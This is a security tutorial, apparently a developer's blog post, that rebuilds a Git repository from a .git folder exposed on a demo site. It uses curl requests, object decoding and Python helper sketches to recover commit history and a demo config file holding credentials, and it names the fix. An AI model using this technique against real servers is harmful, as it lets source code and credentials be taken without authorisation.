Hacking a Git Repository

Rebuilding a Git repository from publicly accessible files is more straightforward than many people think. Leaving your .git folder on a production server (or on any public server, for that matter) opens a massive security hole if the repository tracks sensitive material such as source code or credentials.

Story Time and Context

Some time ago I worked at a company that uploaded the entire Git repository to the production servers to facilitate deployments. That’s a fair use case; however, my co-workers at the time often forgot to deny public access to this directory, an oversight they considered harmless. I cannot remember how many times I had to explain the consequences to them.

Gathering Information

Finding a vulnerable website is as simple as sending a GET request to example.com/.git/HEAD and checking whether the server returns the file.

Let’s pause here to point out that an easy fix for the “vulnerability” is to move the Git folder outside the publicly served directory. Deployments still work as long as the connection happens via SSH.

Demonstration

As a demo, I’ve created a Git repository for a super secret project and uploaded it to a website served at https://secret.test/. Of course, because I’m a smart programmer, I’ve decided not to deny access to the files inside the “.git” folder.

Analyzing the HEAD

I’ll start by checking if the HEAD file exists.

To do that, I send a simple GET request to the website, guessing the path of the “.git” folder. In this example we assume it sits in the root directory, but in other cases it could be further down in the file tree.

HEAD is a reference to the currently checked-out branch and, through it, to the last commit on that branch.

$ curl -i "https://secret.test/.git/HEAD"
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 23
Content-Type: text/plain; charset=utf-8

ref: refs/heads/master

We can see that the server returns a “200 OK” response, meaning the request was successful, along with the content of the file: a reference to a Git branch called “master”.
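The content of HEAD is simple enough to interpret programmatically. The following is a minimal sketch, not part of the original demo; the function name parse_head is made up for illustration. It assumes HEAD holds either a symbolic reference (the "ref: ..." form shown above) or, when the repository is in a detached state, a bare 40-character commit hash.

```python
def parse_head(content):
    """Classify the content of a .git/HEAD file.

    Returns ("ref", "refs/heads/<branch>") for a symbolic reference, or
    ("sha", "<40 hex chars>") when HEAD is detached and holds a commit hash.
    parse_head is a hypothetical helper, not a Git API.
    """
    text = content.strip()
    if text.startswith("ref:"):
        return ("ref", text[len("ref:"):].strip())
    if len(text) == 40 and all(c in "0123456789abcdef" for c in text):
        return ("sha", text)
    raise ValueError("not a recognizable HEAD file")


kind, target = parse_head("ref: refs/heads/master\n")
print(kind, target)      # ref refs/heads/master
print(".git/" + target)  # .git/refs/heads/master
```

For a symbolic reference, the returned target is the path, relative to the “.git” folder, of the file to request next.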

A branch in Git is a lightweight movable pointer to a commit. The default branch name in Git is master. As you initially make commits, the master branch points to the last commit you made. Every time you commit, it moves forward automatically.

Projects that use “Git Flow” often deploy changes using different branches, for example, develop or hotfix or even the name of a specific feature in the project. For instance, we could also find a reference named “refs/heads/develop” if the programmer has deployed the project using the work tree under the “develop” branch.

Gitflow Workflow is an abstract idea of a Git workflow design that defines a strict branching model designed around the project release. Gitflow is ideally suited for projects that have a scheduled release cycle. This workflow doesn’t add any new concepts or commands beyond what’s required for the Feature Branch Workflow. Instead, it assigns particular roles to different branches and defines how and when they should interact.

Ref: https://nvie.com/posts/a-successful-git-branching-model/

Analyzing the Branch

We can now inspect the branch reference:

$ curl -i "https://secret.test/.git/refs/heads/master"
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 41
Content-Type: text/plain; charset=utf-8

8a32c4056d72a4f481ee525b87f927e00b295edc

With this request, we’ve obtained one of the many hashes that identify the objects making up the entire Git tree. All objects live inside .git/objects/, but we have to split the hash into two parts: the first two hexadecimal characters name the folder where the object is stored, and the remaining thirty-eight characters name the object file itself.

$ curl -s "https://secret.test/.git/objects/8a/32c4056d72a4f481ee525b87f927e00b295edc" | hexdump -v -C
00000000  78 01 95 93 c9 0e ab 46  10 45 b3 e6 2b 7a 6f 25  |x......F.E..+zo%|
00000010  80 19 4c 4b 79 51 98 0c  d8 98 c9 18 03 3b 68 9a  |..LKyQ.......;h.|
00000020  c1 c6 d8 b4 c1 0c 5f 1f  e7 45 d9 65 93 92 4a 57  |......_..E.e..JW|
[…]
00000320  ff 95 18 4a 2e 0a f0 46  a4 79 0d 60 78 02 82 b3  |...J...F.y.`x...|
00000330  02 0c 35 06 e8 d9 95 4d  35 92 6c 68 9e 1d 28 9b  |..5....M5.lh..(.|
00000340  16 53 7f 01 24 f3 62 88                           |.S..$.b.|
00000348
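The hash-to-path rule used in the request above can be written down as a small helper. This is only a sketch; the function name object_url and its base_url parameter are assumptions made for illustration.

```python
def object_url(base_url, sha):
    """Build the URL of a loose object from its 40-character SHA-1 hash.

    object_url is a hypothetical helper; base_url is the exposed .git folder.
    """
    sha = sha.strip().lower()
    if len(sha) != 40 or any(c not in "0123456789abcdef" for c in sha):
        raise ValueError("expected a 40-character hexadecimal hash")
    # The first two characters name the folder, the remaining 38 name the file.
    return f"{base_url.rstrip('/')}/objects/{sha[:2]}/{sha[2:]}"


print(object_url("https://secret.test/.git",
                 "8a32c4056d72a4f481ee525b87f927e00b295edc"))
# https://secret.test/.git/objects/8a/32c4056d72a4f481ee525b87f927e00b295edc
```

This layout applies to loose objects only. Objects that Git has already packed are stored under .git/objects/pack/ and cannot be fetched this way.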

Analyzing the Object

At first, I didn’t know the encoding of Git objects, so I went ahead and inspected the file:

$ file 32c4056d72a4f481ee525b87f927e00b295edc
object: VAX COFF executable not stripped - version 3224

The Common Object File Format (COFF) is a format for executable, object code, and shared library computer files used on Unix systems. It was introduced in Unix System V, replaced the previously used a.out format, and formed the basis for extended specifications such as XCOFF and ECOFF, before being largely replaced by ELF, introduced with SVR4.

COFF’s main improvement over a.out was the introduction of multiple named sections in the object file. Different object files could have different numbers and types of sections.

https://en.wikipedia.org/wiki/COFF

Unfortunately, Git objects are not “COFF” executables; the file command simply guessed wrong.

Git stores its objects zlib-compressed, which is why the file command cannot make any sense of them. When Git stores an object, it first builds a header containing the object type and the content size, appends the content to that header, computes the SHA-1 hash of the result, and finally compresses it with zlib before writing it to disk.
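To make the storage format concrete, here is a minimal sketch in Python of both directions: building a loose object the way Git does, and inflating one back into its type, size, and content. The function names are made up for illustration. The header layout is the object type, a space, the content size in decimal, and a NUL byte.

```python
import hashlib
import zlib


def encode_loose_object(obj_type, body):
    """Build the on-disk form of a loose object: returns (sha1_hex, compressed)."""
    # Header is "<type> <size>\0", followed directly by the content.
    store = obj_type.encode() + b" " + str(len(body)).encode() + b"\x00" + body
    return hashlib.sha1(store).hexdigest(), zlib.compress(store)


def decode_loose_object(compressed):
    """Inflate a loose object and split it into (type, size, body)."""
    store = zlib.decompress(compressed)
    header, _, body = store.partition(b"\x00")
    obj_type, _, size = header.partition(b" ")
    if int(size.decode()) != len(body):
        raise ValueError("size in header does not match the body length")
    return obj_type.decode(), len(body), body


empty_sha, _ = encode_loose_object("blob", b"")
print(empty_sha)  # e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 (Git's empty blob)

_, compressed = encode_loose_object("blob", b"hello\n")
print(decode_loose_object(compressed))  # ('blob', 6, b'hello\n')
```

Because the hash covers the header plus the content, a downloaded object can be verified by inflating it and comparing the SHA-1 of the result against the hash in its path.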

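Reading through the Git man page, we can find a tool listed under the Interrogation section called git cat-file. Much like the Unix cat command, git cat-file displays the content, type, or size of a repository object, be it a commit, a tree, or a blob. It looks objects up in the local repository, so the downloaded file must first be saved under .git/objects/8a/ in a local directory that Git recognizes as a repository.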

We can inspect the type of object:

$ git cat-file -t 8a32c4056d72a4f481ee525b87f927e00b295edc
commit

We can also inspect the object size:

$ git cat-file -s 8a32c4056d72a4f481ee525b87f927e00b295edc
1099

We can also inspect the content:

$ git cat-file -p 8a32c4056d72a4f481ee525b87f927e00b295edc
tree 309b205498a0a719916c583eefeb22eed0aae69e
parent 65844bce2edc0607aa9bb4e8f728f7e8c4c7e4b3
author cixtor <[email protected]> 1544293897 -0800
committer cixtor <[email protected]> 1544293897 -0800
gpgsig -----BEGIN PGP SIGNATURE-----

 OTdiNTBmYjc5MjcyMGYzNTdmNzIzNTQyM/2JlYWVlYmIzMmQ0YjM3ZQNj/BkODI0
 NDZjMz//EwM2RiNDg1MjQwMmQxMGQ4NWI/1NzYzNmVmY2NlYwNDA4Yzll/MWE2NT
 g/5NTAxODdmNmQxOTAwN2Q2M2Q3MTk/5ODk1MWRhYQZTJk+ODYxYjZkZTY2NTY3M
 Tc4MjMxNjhkZmQ4ZWNmNWYyZTNjMGYwO+QNDQyZGUyM2FhYjQzMDcwNTk+1M2VjN
 jQ4NTRjM2F/iNWQ4Y2ViNThmOQYmY3YTc2/NzQxOTc3+ZjdhMmUwYjY4ODkzMTkz
 Y2I0ZDZkN2YyOWMyMgOGY2/N2ZlOWQ3ODc5M+DU2NWM5NzlhNDIzOTQ4/MTk5Y/z
 ZjYjNiOTAzYQM2M5N2RmNjZlYmU1NGU2Y2E0NzUwMz/Y3NGQzOTQyZGFmM2QyY2I
 1MgNGRjODAwZDliODU2NzkyZTYzYm/FhMWU5YTAxZDgyODY1Yzg1NzMyM+gYjYwN
 DBmNjY5M2ZkZDgzYzYyZDhkNTE4MzQ2NjZkMjI5NTk4NTNiYwNTcxMWVhYzAyM2E
 5NjNkZWVkYWFiYTc1NDMzNjFmOD+I1YmYxMDlmZgNWY0MDcwN2/Y4NGNlM2IyODl
 jOTU5NWZl+Njk4NGNiYzFlNTc4NDM4MAODhhYmYyZjdhOWQxNTMxYTQ0ZTY5YTk3
 MzMwYjg1NDM4NjcyZj+I2NwN2Y/2ZGVlMTE5NGQ4ZGNmYzU0OGM=
 3ZDl/
 -----END PGP SIGNATURE-----

Add script to read the configuration file

Great! We’ve done it.

Now we have the first Git object decoded, and we can already see useful information: for example, the email addresses of both the author and the committer, who in some cases may be different people. We can also see the hash of the parent commit, which we can later use to continue building the rest of the Git tree. At the very end of the output is the commit message.
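The fields of a decoded commit are easy to pull apart in code. The sketch below is one possible way to do it; parse_commit is a hypothetical helper, and the email address in the sample is a placeholder rather than the real one. It relies on the layout visible above: header lines, a blank line, then the message. Multi-line headers such as gpgsig continue on lines that start with a space, so they are skipped.

```python
def parse_commit(body):
    """Split the text of a commit object into header fields and message."""
    headers, _, message = body.partition("\n\n")
    commit = {"tree": None, "parents": [], "message": message.strip()}
    for line in headers.split("\n"):
        if line.startswith(" "):
            continue  # continuation of a multi-line header (e.g. gpgsig)
        key, _, value = line.partition(" ")
        if key == "tree":
            commit["tree"] = value
        elif key == "parent":
            commit["parents"].append(value)  # merge commits have several
        elif key in ("author", "committer"):
            commit[key] = value
    return commit


# Sample based on commit 65844bc; the email address is a placeholder.
sample = (
    "tree 2527ba1c4a08175454a90c893bd452e5f7a008da\n"
    "parent 205040993f81fb0b0df94e3d6920eb109b243640\n"
    "author cixtor <author@example.test> 1544293884 -0800\n"
    "committer cixtor <author@example.test> 1544293884 -0800\n"
    "\n"
    "Add credentials to access the application\n"
)
info = parse_commit(sample)
print(info["tree"])     # 2527ba1c4a08175454a90c893bd452e5f7a008da
print(info["parents"])  # ['205040993f81fb0b0df94e3d6920eb109b243640']
print(info["message"])  # Add credentials to access the application
```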

We can also see, at least in this demo, the PGP signature.

Download All Objects

We can repeat the previous steps to get a copy of the entire Git tree by merely changing the hash to the one tagged as “parent” inside each object. In the example above, we can see that the parent hash of 8a32c40 is 65844bc, so let’s go ahead and download that one:

# https://secret.test/.git/objects/65/844bce2edc0607aa9bb4e8f728f7e8c4c7e4b3

$ git cat-file -p 65844bc
tree 2527ba1c4a08175454a90c893bd452e5f7a008da
parent 205040993f81fb0b0df94e3d6920eb109b243640
author cixtor <[email protected]> 1544293884 -0800
committer cixtor <[email protected]> 1544293884 -0800

Add credentials to access the application

The parent commit of 65844bc is 2050409, so let’s download that too:

# https://secret.test/.git/objects/20/5040993f81fb0b0df94e3d6920eb109b243640

$ git cat-file -p 205040993f81fb0b0df94e3d6920eb109b243640
tree afda558484e1250869fd26a887de3a7fc42a2f04
author cixtor <[email protected]> 1544293869 -0800
committer cixtor <[email protected]> 1544293869 -0800

Add project description

There are no more parents, so this must be the first commit in the history and the last one we need to download.
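Following the parent links by hand works for three commits, but the same loop is easy to automate. The sketch below walks the history breadth-first. The read_commit argument is a hypothetical callback that returns the decoded text of a commit given its hash; in practice it would download and inflate the object, while here an in-memory dictionary stands in for it so the example runs offline. Only the tree and parent header lines from the commits above are reproduced.

```python
from collections import deque


def parent_hashes(commit_text):
    """Return the hashes on the "parent" header lines of a commit object."""
    headers = commit_text.split("\n\n", 1)[0]
    return [line.split(" ", 1)[1] for line in headers.split("\n")
            if line.startswith("parent ")]


def walk_history(start, read_commit):
    """Visit every commit reachable from `start`, breadth-first.

    read_commit is a caller-supplied (hypothetical) function that maps a
    commit hash to the decoded text of that commit.
    """
    seen, order, queue = set(), [], deque([start])
    while queue:
        sha = queue.popleft()
        if sha in seen:
            continue  # merge histories can reach a commit twice
        seen.add(sha)
        order.append(sha)
        queue.extend(parent_hashes(read_commit(sha)))
    return order


commits = {
    "8a32c4056d72a4f481ee525b87f927e00b295edc":
        "tree 309b205498a0a719916c583eefeb22eed0aae69e\n"
        "parent 65844bce2edc0607aa9bb4e8f728f7e8c4c7e4b3\n\n"
        "Add script to read the configuration file\n",
    "65844bce2edc0607aa9bb4e8f728f7e8c4c7e4b3":
        "tree 2527ba1c4a08175454a90c893bd452e5f7a008da\n"
        "parent 205040993f81fb0b0df94e3d6920eb109b243640\n\n"
        "Add credentials to access the application\n",
    "205040993f81fb0b0df94e3d6920eb109b243640":
        "tree afda558484e1250869fd26a887de3a7fc42a2f04\n\n"
        "Add project description\n",
}
history = walk_history("8a32c4056d72a4f481ee525b87f927e00b295edc",
                       commits.__getitem__)
print([sha[:7] for sha in history])  # ['8a32c40', '65844bc', '2050409']
```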

Download the Trees

However, that’s not the end of the game. We also need to download the “tree” object referenced by each commit, and do so recursively, because a tree can reference further trees for subdirectories. Tree objects list the names of the files in the repository together with the hashes of the blobs that hold their actual data. Fortunately, the process is no different from getting the commit objects, so let me skip some commands:

https://secret.test/.git/objects/30/9b205498a0a719916c583eefeb22eed0aae69e
https://secret.test/.git/objects/25/27ba1c4a08175454a90c893bd452e5f7a008da
https://secret.test/.git/objects/af/da558484e1250869fd26a887de3a7fc42a2f04

Download the Blobs

We can inspect the tree objects the same way we do with commit objects:

$ git cat-file -p afda558
100644 blob 95a07df7b2dc89519fb7f8ec2718a1b9489b3880  README.md

$ git cat-file -p 2527ba1
100644 blob 95a07df7b2dc89519fb7f8ec2718a1b9489b3880  README.md
100644 blob 4912545916f85dff77b0906954ddae99f5d698ba  config.json

$ git cat-file -p 309b205
100644 blob 95a07df7b2dc89519fb7f8ec2718a1b9489b3880  README.md
100644 blob 4912545916f85dff77b0906954ddae99f5d698ba  config.json
100644 blob 3c46072b78a65b31cf3399d176236f1ba31f692f  index.php

Here we can see how the project has progressed. At first, there was only a Markdown file called “README.md”, then after one of the commits analyzed above, a new file called “config.json” was added to the tree, and then “index.php” in a subsequent commit.
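The readable listing above is produced by git cat-file; the tree object itself is binary. As a rough sketch of what is inside, the parser below assumes the usual layout of each entry: the file mode in ASCII, a space, the file name, a NUL byte, and then the 20 raw bytes of the SHA-1 hash. The function name parse_tree is made up, and the sample body is rebuilt by hand from the entries of tree 2527ba1.

```python
def parse_tree(body):
    """Decode the body of a tree object into (mode, name, sha1_hex) tuples."""
    entries, pos = [], 0
    while pos < len(body):
        space = body.index(b" ", pos)      # end of the mode
        nul = body.index(b"\x00", space)   # end of the file name
        mode = body[pos:space].decode()
        name = body[space + 1:nul].decode()
        sha = body[nul + 1:nul + 21].hex() # 20 raw bytes, not hex text
        entries.append((mode, name, sha))
        pos = nul + 21
    return entries


# Body of tree 2527ba1, reconstructed from the listing above.
raw = (
    b"100644 README.md\x00"
    + bytes.fromhex("95a07df7b2dc89519fb7f8ec2718a1b9489b3880")
    + b"100644 config.json\x00"
    + bytes.fromhex("4912545916f85dff77b0906954ddae99f5d698ba")
)
for mode, name, sha in parse_tree(raw):
    print(mode, name, sha)
# 100644 README.md 95a07df7b2dc89519fb7f8ec2718a1b9489b3880
# 100644 config.json 4912545916f85dff77b0906954ddae99f5d698ba
```

An entry whose mode is 40000 points to another tree (a subdirectory), which is what makes the download recursive. The demo repository has no subdirectories, so none appear here.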

To get a copy of the files, we need to download the blobs referenced on each tree object.

Getting a copy of the latest version of the Git tree is useful if you only care about the current state of the project. Getting a copy of the content of the repository for a specific commit makes sense if you know what you are looking for, for example, if you find in the commit messages references to secret files, credentials, access keys, or passwords. If you have enough time, you may want to download the entire Git history.

https://secret.test/.git/objects/95/a07df7b2dc89519fb7f8ec2718a1b9489b3880
https://secret.test/.git/objects/49/12545916f85dff77b0906954ddae99f5d698ba
https://secret.test/.git/objects/3c/46072b78a65b31cf3399d176236f1ba31f692f

Exploring the Git Tree

After downloading HEAD, the current branch reference, and the commit, tree, and blob objects, we have this:

$ tree -a -- .git/
.git
├── HEAD
├── objects
│   ├── 20/5040993f81fb0b0df94e3d6920eb109b243640 (commit)
│   ├── 25/27ba1c4a08175454a90c893bd452e5f7a008da (tree)
│   ├── 30/9b205498a0a719916c583eefeb22eed0aae69e (tree)
│   ├── 3c/46072b78a65b31cf3399d176236f1ba31f692f (blob)
│   ├── 49/12545916f85dff77b0906954ddae99f5d698ba (blob)
│   ├── 65/844bce2edc0607aa9bb4e8f728f7e8c4c7e4b3 (commit)
│   ├── 8a/32c4056d72a4f481ee525b87f927e00b295edc (commit)
│   ├── 95/a07df7b2dc89519fb7f8ec2718a1b9489b3880 (blob)
│   └── af/da558484e1250869fd26a887de3a7fc42a2f04 (tree)
└── refs/heads/master

12 directories, 11 files

We can now use commands like git log to inspect the history:

$ git log --pretty="format:%h <%ae> %s"
8a32c40 <[email protected]> Add script to read the configuration file
65844bc <[email protected]> Add credentials to access the application
2050409 <[email protected]> Add project description

Or git show [commit] to inspect a specific commit:

$ git show 65844bc
commit 65844bce2edc0607aa9bb4e8f728f7e8c4c7e4b3
Author: cixtor <[email protected]>

    Add credentials to access the application

diff --git a/config.json b/config.json
new file mode 100644
index 0000000..4912545
--- /dev/null
+++ b/config.json
@@ -0,0 +1,4 @@
+{
+  "username": "[email protected]",
+  "password": "p455w0rd"
+}

Or git status to inspect the current status of the repository:

$ git status
On branch master
Changes to be committed:
  (use "git reset HEAD <file>..." to unstage)

  deleted:    README.md
  deleted:    config.json
  deleted:    index.php

We can even reset the repository to recover the deleted files.

$ git reset --hard HEAD
HEAD is now at 8a32c40 Add script to read the configuration file

$ ls -1a
.
..
.git
README.md
config.json
index.php

$ jq . < config.json
{
  "username": "[email protected]",
  "password": "p455w0rd"
}

Conclusion

Now you understand why leaving your .git directory exposed is a bad idea.

I hope you have enjoyed the article. Please share it with your colleagues.

Happy Hacking!
